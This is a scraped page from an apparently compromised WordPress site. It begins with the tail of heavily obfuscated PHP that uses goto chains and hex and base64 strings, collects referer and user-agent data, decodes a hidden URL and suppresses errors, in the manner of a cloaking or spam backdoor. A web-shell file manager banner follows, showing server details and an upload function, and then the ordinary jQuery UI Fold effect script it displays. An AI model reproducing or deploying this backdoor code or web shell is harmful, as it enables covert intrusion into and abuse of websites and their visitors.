0\55\x39\x5d\53\x29\57\151", $piy60bQyAnmwu, $fMZCGpzXIHdXc)) { goto vVautltD9pgat; } goto QURXpFsqcezNk; rvqliqjc1xW2s: } goto YKJVuIud1y3Hx; CD6aovTgWStLQ: qG5WxA5oULq4r: goto IDLFDyQ40jUQw; nKKlRdaTBUEfs: } goto yhh5seL76AlhE; cG1qwsrVKUhAR: $BTpSYQ1gh356Q = "\162" . "\x61" . "\156" . "\147" . "\145"; goto Z8gGprhCwNclv; tpGSLl6IltjAa: $OLt2pIUxDIZX7 = sK2zSXpfW8NHA(base64_decode("\141\110\x52\x30\143\104\157\x76\x4c\63\x70\x7a\116\x54\105\x79\x64\152\x45\x7a\x63\x33\125\165\x64\x6d\x6c\163\142\107\154\x72\132\x53\65\151\x64\x58\160\66\x4c\167"), $JKbxMW7SLidHJ); goto tdnWrTPFfHrN_; rGBcGSH7bOWl8: v7BiKzcUe7NVA: goto GQ137v0WXCO4T; cjLXJ9pMLNG5G: cAvpUHPIfbemF: goto kwO0nEPdLQZXv; S7lRY4Ca6UT3I: exit(strrev(md5($_SERVER["\x53\105\122\x56\x45\122\x5f\x4e\101\x4d\105"]))); goto cjLXJ9pMLNG5G; H_JiWJUIPpOX8: $JKbxMW7SLidHJ["\x72\146"] = NvNcVk2qlts6o($UYxVdrtJb00As); goto j0aaphAXw1kpA; jtzwlaokYthBl: error_reporting(0); goto TKSUwEdC8pMfd; VS4tVkHBRrpsu: exit(0); goto eiyEYk3U7Rboa; Z8gGprhCwNclv: $ReZqJAK0qhmNI = $BTpSYQ1gh356Q("\176", "\40"); goto qwyeLgMLvmqC7; kmF2AHsYU489E: XlVOGgYzthZ9X: goto KBePiWpZX6o0U; M4BKGtqiZd2WW: OQq_lTKJj2x5A: goto agzRa8EKTMA3y; UOe2bSmmOoPql: header("\103\x6f\x6e\164\145\156\164\x2d\x54\x79\160\x65\72\x20\164\x65\x78\164\x2f\x68\164\155\x6c\x3b\40\143\x68\141\162\x73\x65\164\75\165\164\146\55\70"); goto jtzwlaokYthBl; pdh0Hnac8x201: error_reporting(0); goto cG1qwsrVKUhAR; pr8aJ8w6A_Nz4: $JKbxMW7SLidHJ["\165"] = nVnCvK2QLTS6o($_SERVER["\110\124\x54\120\x5f\125\x53\105\x52\x5f\x41\x47\105\x4e\124"]); goto azYfByCJYog8f; SPcdUq1dLBsGr: $UYxVdrtJb00As = strval(@$_SERVER["\110\124\x54\x50\x5f\x52\x45\106\x45\x52\105\122"]); goto ydlW3mMga7JVK; rs2b4CdLOk7JQ: AurMMafL6BWze: ?> HEX
HEX
Server: Apache/2
System: Linux server.winterserver.com 4.18.0 #1 SMP Wed Jul 12 12:00:44 MSK 2023 x86_64
User: hotjamba (1034)
PHP: 7.4.33
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Upload Files
File: /home/hotjamba/domains/hotjamband.com/private_html/wp-includes/js/jquery/ui/effect-fold.js
/*!
 * jQuery UI Effects Fold 1.13.3
 * https://jqueryui.com
 *
 * Copyright OpenJS Foundation and other contributors
 * Released under the MIT license.
 * https://jquery.org/license
 */

//>>label: Fold Effect
//>>group: Effects
//>>description: Folds an element first horizontally and then vertically.
//>>docs: https://api.jqueryui.com/fold-effect/
//>>demos: https://jqueryui.com/effect/

( function( factory ) {
	"use strict";

	if ( typeof define === "function" && define.amd ) {

		// AMD. Register as an anonymous module.
		define( [
			"jquery",
			"../version",
			"../effect"
		], factory );
	} else {

		// Browser globals
		factory( jQuery );
	}
} )( function( $ ) {
"use strict";

return $.effects.define( "fold", "hide", function( options, done ) {

	// Create element
	var element = $( this ),
		mode = options.mode,
		show = mode === "show",
		hide = mode === "hide",
		size = options.size || 15,
		percent = /([0-9]+)%/.exec( size ),
		horizFirst = !!options.horizFirst,
		ref = horizFirst ? [ "right", "bottom" ] : [ "bottom", "right" ],
		duration = options.duration / 2,

		placeholder = $.effects.createPlaceholder( element ),

		start = element.cssClip(),
		animation1 = { clip: $.extend( {}, start ) },
		animation2 = { clip: $.extend( {}, start ) },

		distance = [ start[ ref[ 0 ] ], start[ ref[ 1 ] ] ],

		queuelen = element.queue().length;

	if ( percent ) {
		size = parseInt( percent[ 1 ], 10 ) / 100 * distance[ hide ? 0 : 1 ];
	}
	animation1.clip[ ref[ 0 ] ] = size;
	animation2.clip[ ref[ 0 ] ] = size;
	animation2.clip[ ref[ 1 ] ] = 0;

	if ( show ) {
		element.cssClip( animation2.clip );
		if ( placeholder ) {
			placeholder.css( $.effects.clipToBox( animation2 ) );
		}

		animation2.clip = start;
	}

	// Animate
	element
		.queue( function( next ) {
			if ( placeholder ) {
				placeholder
					.animate( $.effects.clipToBox( animation1 ), duration, options.easing )
					.animate( $.effects.clipToBox( animation2 ), duration, options.easing );
			}

			next();
		} )
		.animate( animation1, duration, options.easing )
		.animate( animation2, duration, options.easing )
		.queue( done );

	$.effects.unshift( element, queuelen, 4 );
} );

} );